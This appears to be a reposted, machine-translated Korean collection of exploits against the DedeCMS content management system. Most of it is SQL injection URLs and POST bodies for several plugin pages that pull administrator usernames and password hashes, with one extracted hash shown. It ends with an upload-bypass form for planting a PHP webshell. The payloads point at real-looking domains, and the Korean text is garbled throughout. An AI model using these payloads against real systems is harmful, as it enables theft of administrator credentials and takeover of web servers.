DedeCMS 여러 구멍 exp 집합
4466 단어 DEDE
1. dedecms plus / search. php 주입 구멍 복구 및 이용
0×1:
http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
오류: Safe Alert: Request Error step 2!다음 exp 를 이용 합 니 다.
http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0×2:
http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
오류: Safe Alert: Request Error step 1!다음 exp 를 이용 합 니 다.
http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
2. DedeCms recommend. php 주입
exp:
http://0day5.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
3. flink. php 주입
0x1: 우선 flinkadd. php 인증 코드 보기
0x2: 불 여우의 hackbar 를 이용 하여 post 패 킷 을 보 냅 니 다.
exp:
버 전 찾기:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate= &_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\
비밀번호 찾기:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate= &_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\
자세 한 상황 은 보십시오.
http://www.wooyun.org/bugs/wooyun-2014-051950
4. ajaxmembergroup. php 주입 구멍
① 구멍 을 주입 한다.이 역http://www.30tianlong.com/먼저 "/ data / admin / ver. txt" 페이지 를 방문 하여 시스템 의 마지막 업그레이드 시간 을 가 져 온 다음 "/ member / ajax membergroup. php? action = post & membergroup = 1" 페이지 를 방문 합 니 다. 그림 설명 과 같이 이 구멍 이 있 습 니 다.그리고 문 구 를 써 서 관리자 계 정 을 봅 니 다.
http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
admin
관리자 비밀번호 보기
http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
관리자 비밀번호 보기
19 명 을 얻 었 습 니 다. 앞의 3 명 과 마지막 한 명 을 제거 하고 관리자 의 16 명의 MD5 를 얻 었 습 니 다.
8d29b1ef9f8c5a5af429
cmd 5 가 풀 리 지 않 아서 두 번 째 방법 을 테스트 할 수 밖 에 없어 요.
② 업로드 빈틈:
회원 센터 에 로그 인하 고 페이지 링크 를 방문 하면
http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[/code]=../dialog/select_soft_post
그림 과 같이 "/ plus / carbuyaction. php" 를 통 해 업로드 페이지 "/ dialog / select soft post" 를 성공 적 으로 호출 하 였 음 을 설명 합 니 다.
그래서 Php 한 마디 목마 확장 명 을 "rar" 등 으로 바 꾸 고 제출 페이지 를 이용 하여 1. htm 를 업로드 합 니 다.
<form action="http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs1=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="simple.Php"/>
<button class="button2" type="submit"> </button><br><br>
업로드 성공
글 을 전재 하 다 http://www.i0day.com